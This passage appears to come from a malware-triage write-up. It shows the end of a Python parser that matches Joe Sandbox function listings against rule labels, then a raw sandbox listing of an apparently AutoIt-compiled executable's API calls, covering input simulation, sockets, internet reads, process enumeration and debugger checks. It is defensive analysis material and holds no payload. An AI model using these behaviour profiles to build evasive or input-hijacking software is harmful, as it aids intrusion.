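    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["addr"]))
            continue
        s = line.strip()
        if s.startswith("• API String ID:"):
            cur.api_string_id = s.split(":", 1)[1].strip()
            entries.append(cur)
            cur = FunctionEntry()
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• String ID:"):
            cur.string_id = s.split(":", 1)[1].strip()
    return entries


def triage(text):
    """Parse the entries and attach every rule label whose API set and string needle match."""
    entries = parse_entries(text)
    for e in entries:
        names = e.api_names()
        for label, required, needle in RULES:
            if required <= names and (needle is None or needle in e.string_id):
                e.hits.append(label)
    return entries


if __name__ == "__main__":
    for e in triage(SAMPLE):
        calls = ", ".join(f"{n}@{a}" for n, _, a in e.apis)
        print(f"[{e.api_string_id}] {'; '.join(e.hits) or 'no rule'}: {calls}")
```

Feed it the full text of the function listing instead of SAMPLE and it yields one record per entry; the hits are a starting point for which functions to open in the disassembly, not a verdict, since the same rules fire on any compiled AutoIt executable. The "API String ID" key is useful for deduplication: its second half is the string hash, so the two `\*.*` walkers above (1946585618-1173974218 and 2649000838-1173974218) share it while differing in their API set.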
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 54e9296a078322a9e8991ba9fd9ada940e5023c5eb1ba9af3e7b5fddf793a82c
                                                      • Instruction ID: a83b344b2b4eda44b03b1d0501f212a0f77c5043f72db34d53b1ad645d1c1818
                                                      • Opcode Fuzzy Hash: 54e9296a078322a9e8991ba9fd9ada940e5023c5eb1ba9af3e7b5fddf793a82c
                                                      • Instruction Fuzzy Hash: 8FC25B71E486288FDB25CE28ED407EAB7B5EB44345F1451EAD80EF7281E774AE858F40
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EA64DC
                                                      • CoInitialize.OLE32(00000000), ref: 00EA6639
                                                      • CoCreateInstance.OLE32(00ECFCF8,00000000,00000001,00ECFB68,?), ref: 00EA6650
                                                      • CoUninitialize.OLE32 ref: 00EA68D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: b2e3a162891a2e073e51d1bb48c60f3288a328d8ac6491c2885f0c7e2507afdc
                                                      • Instruction ID: 92012fdafc706899d19b504c162a9a38b88337cc58bcb88b86e66b2b7e38cfd3
                                                      • Opcode Fuzzy Hash: b2e3a162891a2e073e51d1bb48c60f3288a328d8ac6491c2885f0c7e2507afdc
                                                      • Instruction Fuzzy Hash: 01D16971608301AFC314EF24C885E6BBBE8FF99304F14596DF595AB291EB70E905CB92
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00EB22E8
                                                        • Part of subcall function 00EAE4EC: GetWindowRect.USER32(?,?), ref: 00EAE504
                                                      • GetDesktopWindow.USER32 ref: 00EB2312
                                                      • GetWindowRect.USER32(00000000), ref: 00EB2319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EB2355
                                                      • GetCursorPos.USER32(?), ref: 00EB2381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB23DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 2517f57d92005935f4a2267c3d41a995716f00fba9ba936f0fe57ff833ef7a8e
                                                      • Instruction ID: 382b2f9f89286223963bdef3fd8c16a8e178598233995b5bd5abc42fcf5eb5d4
                                                      • Opcode Fuzzy Hash: 2517f57d92005935f4a2267c3d41a995716f00fba9ba936f0fe57ff833ef7a8e
                                                      • Instruction Fuzzy Hash: 3731DE72104306AFCB20DF55C848E9BB7E9FF88314F10192DFA89A7191DB35E909CB92
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EA9B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EA9C8B
                                                        • Part of subcall function 00EA3874: GetInputState.USER32 ref: 00EA38CB
                                                        • Part of subcall function 00EA3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA3966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EA9BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EA9C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 28b72539c3dc90c1f8097b8ad0a1c6630e3b5d40aa9d630cb998413a46b7078d
                                                      • Instruction ID: 93f28f0c69b507148abf75c3cde116d967e0a46a3e35265396bbb66b5274e88d
                                                      • Opcode Fuzzy Hash: 28b72539c3dc90c1f8097b8ad0a1c6630e3b5d40aa9d630cb998413a46b7078d
                                                      • Instruction Fuzzy Hash: E34172719046099FCF14DFA4C949AEEBBF4EF0A314F245065E815B6192DB31AE45CF60
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,"R), ref: 00E9DBCE
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E9DBDD
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9DBEE
                                                      • FindClose.KERNEL32(00000000), ref: 00E9DBFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID: "R
                                                      • API String ID: 2695905019-1746183819
                                                      • Opcode ID: bee5bb5f03cc6b7bee2d54bdf5bf7e1bf7cfb7ed9b2a6eafb249f76ff6f332dc
                                                      • Instruction ID: ab37177fe052ef144b93175d76fe25b811edd98db0dc58f66466e7bfe3d6d094
                                                      • Opcode Fuzzy Hash: bee5bb5f03cc6b7bee2d54bdf5bf7e1bf7cfb7ed9b2a6eafb249f76ff6f332dc
                                                      • Instruction Fuzzy Hash: A9F0EC704149245B8B246F7DDC0DCAAB76C9F01334B244712F439E20F0EBB15D5AC5D5
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E49A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00E49B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00E49B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: f088425575d14ef03fea7cd952319659deb8d6965f3339caaaad1ed02c49623d
                                                      • Instruction ID: ad8b209df580c503cbea699f9fd7bcaf1dd37d2fdcbabb6d0f13936151c409a8
                                                      • Opcode Fuzzy Hash: f088425575d14ef03fea7cd952319659deb8d6965f3339caaaad1ed02c49623d
                                                      • Instruction Fuzzy Hash: 8CA12C70108444AEE724AB3DAD48EBB36DDEB42358B242219F54AF6593CA26DD01E375
                                                      APIs
                                                        • Part of subcall function 00EB304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                        • Part of subcall function 00EB304E: _wcslen.LIBCMT ref: 00EB309B
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB185D
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EB18DB
                                                      • WSAGetLastError.WSOCK32 ref: 00EB18E6
                                                      • closesocket.WSOCK32(00000000), ref: 00EB1915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: cc4eebd6d05f28b9c47f054df620d9a8c557dc463be7eede7cc11ca964b2ec03
                                                      • Instruction ID: b8c815fa86943f20da11e1462800f93ae93254f57562f366c52663d6f1b50aaa
                                                      • Opcode Fuzzy Hash: cc4eebd6d05f28b9c47f054df620d9a8c557dc463be7eede7cc11ca964b2ec03
                                                      • Instruction Fuzzy Hash: A351E571A002006FDB14AF24C89AF6A7BE5AB44718F589098FA197F3D3C771AD41CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 4e3240786027adf0d5cb3abe2c8b6efe5526243280b8d64d1feb9659a7245251
                                                      • Instruction ID: 308b9dadb65b4bed9d7d076cc010572650cedc2d4d0eaa14c0ee70e266ee61dc
                                                      • Opcode Fuzzy Hash: 4e3240786027adf0d5cb3abe2c8b6efe5526243280b8d64d1feb9659a7245251
                                                      • Instruction Fuzzy Hash: D32182317402105FD7248F1AC944F66BBE5AF96319F29A0ACE84AAB352C772DC43CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 49682511f2ddce2fa60389ebaa2f4f630d68afb80b95cbdb9d708d5d6957ffc9
                                                      • Instruction ID: 46f675ff8022bf35b6604cfe9e25462df0200d6532983852ce8a68a61c324216
                                                      • Opcode Fuzzy Hash: 49682511f2ddce2fa60389ebaa2f4f630d68afb80b95cbdb9d708d5d6957ffc9
                                                      • Instruction Fuzzy Hash: F8A27F71A0061ACBDF24CF58C9457EEBBB1FF54318F2491AAE819B7285DB709D81CB90
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002,00000000,?,00E628E9,00000003,00E62DF7,?,?), ref: 00E54D09
                                                      • TerminateProcess.KERNEL32(00000000,?,00E628E9,00000003,00E62DF7,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000), ref: 00E54D10
                                                      • ExitProcess.KERNEL32 ref: 00E54D22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID: (
                                                      • API String ID: 1703294689-2063206799
                                                      • Opcode ID: 01053c5b28704dc88558ae406840442f9a4fb2eee10cdaf2ccb5a8b9052e24df
                                                      • Instruction ID: b372235ee7a0d356928925ab6e10ff34fbd53c063341e3cc23c45f2a23e435d4
                                                      • Opcode Fuzzy Hash: 01053c5b28704dc88558ae406840442f9a4fb2eee10cdaf2ccb5a8b9052e24df
                                                      • Instruction Fuzzy Hash: FFE0BFB1400148AFCF11AF55ED09E583B79FB4178AB145464FC09AB162CB36DD86CB50
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E982AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($tb$|
                                                      • API String ID: 1659193697-1968160224
                                                      • Opcode ID: 6e73b2c47a1106b4f2860deb1341d7a8cb06580c449ef3df5ac57da61a16f3a4
                                                      • Instruction ID: ef8cbc5838d8a7055253382d8d912daeb683a5fbc3206a82648df7064b57ed37
                                                      • Opcode Fuzzy Hash: 6e73b2c47a1106b4f2860deb1341d7a8cb06580c449ef3df5ac57da61a16f3a4
                                                      • Instruction Fuzzy Hash: FF324775A007059FCB28CF59C5819AAB7F0FF48714B15D46EE49AEB3A1EB70E941CB40
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00EBA6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00EBA6BA
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00EBA79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBA7AB
                                                        • Part of subcall function 00E4CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E73303,?), ref: 00E4CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: d41827d925bd3bb3f7017ac87ad13b121e05e8752e4fe2f29fdaf26aee33cc21
                                                      • Instruction ID: 2430166acebc65686ae053435e089a6164763502142e21392b079033a3bf6010
                                                      • Opcode Fuzzy Hash: d41827d925bd3bb3f7017ac87ad13b121e05e8752e4fe2f29fdaf26aee33cc21
                                                      • Instruction Fuzzy Hash: F9517D71508300AFC714DF25D886A6BBBF8FF89714F04992DF589A7262EB70D904CB92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E9AAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 00E9AAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E9AB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E9AB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 5a54987e35d6673abd568a532b8d2a7140b4d8f145538d7af669410755dc050a
                                                      • Instruction ID: 4f9d7d23f481e0fa7e542af5da14e6f0bcd84d5a98473705e2032001518b3d9d
                                                      • Opcode Fuzzy Hash: 5a54987e35d6673abd568a532b8d2a7140b4d8f145538d7af669410755dc050a
                                                      • Instruction Fuzzy Hash: 9B312A30A40208AFFF348B698C05BFA77A6AF44314F1C623AF585721D1E7758985C7D2
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00EACE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00EACEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00EACEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: b75f06ebc5e69a54b1e69227ed4d0a35864c1d85ff6bbd39ad29a30312532e64
                                                      • Instruction ID: 563d51b798ad23e324265a80d8321132212c3f3e80e54d7b6ef6559dba75485d
                                                      • Opcode Fuzzy Hash: b75f06ebc5e69a54b1e69227ed4d0a35864c1d85ff6bbd39ad29a30312532e64
                                                      • Instruction Fuzzy Hash: 1F21BD75600705AFEB20CF65C948BA677F8EB05358F20982EE646B6151E770FE09CB90
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA5CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA5D17
                                                      • FindClose.KERNEL32(?), ref: 00EA5D5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 743eae2a9e55a42a92f04f0016dac88d91f214a34f88676ab57d40a26173b296
                                                      • Instruction ID: e5735a5ffe8812f3d2844156dc3928f2dd14b722690805762ca581e99f9da071
                                                      • Opcode Fuzzy Hash: 743eae2a9e55a42a92f04f0016dac88d91f214a34f88676ab57d40a26173b296
                                                      • Instruction Fuzzy Hash: BF518A75604A019FC714CF28C498E96BBE4FF4A324F14955DE99AAB3A1CB30F905CF91
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00E6271A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E62724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00E62731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 81daa1be27fd1bb93a5c735745b89ff0b6b918ce6f61bc485608805c250ba65b
                                                      • Instruction ID: d32081bf2d5c497b955aec752d387f5b7f7b2498b8dd99bc7285aab0c9930160
                                                      • Opcode Fuzzy Hash: 81daa1be27fd1bb93a5c735745b89ff0b6b918ce6f61bc485608805c250ba65b
                                                      • Instruction Fuzzy Hash: 1131C274D4121CABCB21DF68DC88B9CBBB8AF08310F5051EAE91CA6261E7309F858F44
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA51DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EA5238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EA52A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
